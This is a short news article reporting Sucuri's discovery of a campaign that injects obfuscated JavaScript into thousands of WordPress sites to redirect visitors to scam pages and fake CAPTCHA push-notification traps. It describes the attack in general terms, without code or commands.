Thousands of WordPress Sites Hacked and Redirecting Visitors to Scam Pages

By Ava McKinneyOnline Safety

Thousands of WordPress Sites Compromised and Redirecting Users to Scam Pages

Researchers from Sucuri have discovered a large-scale campaign in which hackers are injecting malicious JavaScript code into compromised WordPress sites. These infected sites are then used to redirect visitors to scam pages and various malicious websites. According to experts, more than 6,600 sites have already been affected by this campaign.

The malicious code is injected into various files on hacked sites, including databases and core WordPress files such as ./wp-includes/js/jquery/jquery.min.js and ./wp-includes/js/jquery/jquery-migrate.min.js. Essentially, attackers attempt to place their malicious code in any .js file with “jQuery” in its name. To avoid detection and hide their activity, hackers use CharCode obfuscation techniques.

How the Redirects Work

Typically, these redirects lead to phishing pages, malware downloads, ad banners, or generate even more redirects. For example, the injected code on a compromised site creates a new script element with the domain legendtable[.]com as its source. This domain then contacts a second external domain—local[.]drakefollow[.]com—which in turn contacts another, creating a chain that the visitor passes through before finally landing on a malicious resource.

Before reaching the final destination, some visitors are shown a fake CAPTCHA page that tries to trick them into subscribing to push notifications from a malicious site.

“If a person clicks on the fake CAPTCHA, they will start receiving unwanted ads, even if the site is not open, and the ads will appear as if they are coming from the operating system, not the browser,” experts explain. “Such hidden maneuvers with push notifications are also linked to one of the most common tech support scams, where users are told their computer is infected or running slowly, and are urged to call a toll-free number [controlled by hackers] to resolve the issue.”

How Sites Are Compromised

Researchers say that to initially compromise WordPress sites, attackers exploit numerous vulnerabilities in WordPress plugins and themes, which are discovered on a regular basis.

Leave a Reply